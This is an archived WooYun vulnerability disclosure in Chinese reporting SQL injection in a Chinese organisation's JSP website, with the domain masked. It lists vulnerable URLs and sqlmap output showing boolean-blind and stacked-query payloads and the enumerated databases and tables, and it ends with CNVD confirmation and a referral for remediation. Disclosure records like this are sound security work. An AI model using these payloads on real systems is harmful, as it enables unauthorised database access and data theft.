乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
rt
http://**.**.**.**/Specialreport.jsp?t_id=946&tableName=bd_xinwe241
http://**.**.**.**/newcontent.jsp?messId=1239&tableName=bd_xinwe241
http://**.**.**.**/manage/infordisclosure/topicdetails.jsp?map=y&messId=27&tableName=bd_xinxi648
http://**.**.**.**/law_details.jsp?id=10021&diccode=1002
http://**.**.**.**/sdmessage.jsp?messId=117&tableName=bd_shand306
sqlmap resumed the following injection point(s) from stored session:---Parameter: t_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: t_id=946 AND 4687=4687&tableName=bd_xinwe241 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: t_id=946;WAITFOR DELAY '0:0:5'--&tableName=bd_xinwe241---[15:29:31] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2005[15:29:31] [INFO] fetching database names[15:29:31] [INFO] fetching number of databases[15:29:31] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:29:31] [INFO] retrieved:[15:29:31] [WARNING] reflective value(s) found and filtering out5[15:29:36] [INFO] retrieved: master[15:30:11] [INFO] retrieved: model[15:30:42] [INFO] retrieved: msdb[15:31:07] [INFO] retrieved: sdbc[15:31:33] [INFO] retrieved: tempdbavailable databases [5]:[*] master[*] model[*] msdb[*] sdbc[*] tempdb
Database: sdbc+------------------------------+---------+| Table | Entries |+------------------------------+---------+| dbo.bd_xinwe241 | 858 || dbo.bd_collectiveappointment | 372 || dbo.bd_fuwuz626 | 253 || dbo.bd_newspaperclass | 244 || dbo.bd_ofvolunteer | 242 || dbo.bd_inforziliao | 136 || dbo.bd_dictionary | 132 || dbo.bd_leavemess | 132 || dbo.bd_downDetails | 129 || dbo.bd_leavemessreply | 125 || dbo.bd_zhiyu542 | 119 || dbo.bd_shuxu983 | 115 || dbo.bd_params | 110 || dbo.bd_shand306 | 105 || dbo.bd_download | 94 || dbo.bd_photo | 94 || dbo.bd_zheng309 | 64 || dbo.bd_role | 60 || dbo.bd_newspaper | 54 || dbo.sqlmapoutput | 46 || dbo.bd_xinxi648 | 43 || dbo.bd_zhuan237 | 29 || dbo.bd_zhong3 | 26 || dbo.bd_dept | 23 || dbo.bd_users | 23 || dbo.bd_qx | 21 || dbo.bd_dynamictable | 15 || dbo.bd_bloodaddress | 12 || dbo.bd_announcement | 10 || dbo.bd_featurecontent | 6 || dbo.bd_featuretype | 6 || dbo.bd_flinkmap | 6 || dbo.bd_homepagesurvey | 5 || dbo.bd_link | 5 || dbo.bd_ofvolunteerstar | 5 || dbo.bd_bloodstate | 4 || dbo.test | 4 || dbo.bd_onlycontent | 3 || dbo.bd_aixin455 | 2 || dbo.bd_ofvolunteergroup | 2 || dbo.bd_xinxi75 | 2 || dbo.bd_copyright | 1 || dbo.bd_homepage | 1 || dbo.bd_homepagephono | 1 || dbo.bd_homepageslogan | 1 || dbo.bd_homepagetv | 1 || dbo.bd_leavemessforbid | 1 || dbo.bd_zuzhi | 1 |+------------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-16 14:23
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无